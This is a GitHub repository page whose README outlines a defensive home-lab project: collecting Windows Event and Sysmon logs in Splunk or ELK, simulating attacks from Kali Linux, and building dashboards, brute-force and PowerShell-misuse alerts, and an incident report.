Skip to content

cyb-gufran/SIEM-Log-Monitoring-Project

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

2 Commits
Β 
Β 

Repository files navigation

🧠 SIEM & Log Monitoring Project

A practical cybersecurity project focused on log collection, attack detection, and incident response using Splunk/ELK Stack.

🎯 Objective

Build a SIEM lab to collect, analyze, and visualize logs from Windows systems to detect malicious activity.

🧩 Tools Used

  • Splunk / ELK Stack
  • Windows Event Viewer
  • Sysmon
  • PowerShell
  • Kali Linux (for attack simulation)

πŸ—οΈ Project Phases

  1. Setup & Configuration
  2. Log Collection & Ingestion
  3. Threat Simulation
  4. Detection & Response
  5. Reporting & Documentation

πŸ“Š Expected Output

  • Interactive dashboard (attack timeline)
  • Alerts for brute-force and PowerShell misuse
  • Incident report PDF (with recommendations)

πŸ“ Author

Gufran Ahmed
Cybersecurity & Network Engineering | Penetration Tester
πŸ“ London, UK
πŸ”— LinkedIn: linkedin.com/in/gufran-uh
πŸ’» GitHub: github.com/cyb-gufran

About

A practical cybersecurity project focused on building and configuring a SIEM environment using Splunk/ELK Stack to collect, monitor, and analyze Windows event and Sysmon logs. Includes real-world attack simulations, threat detection dashboards, and an incident response report.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors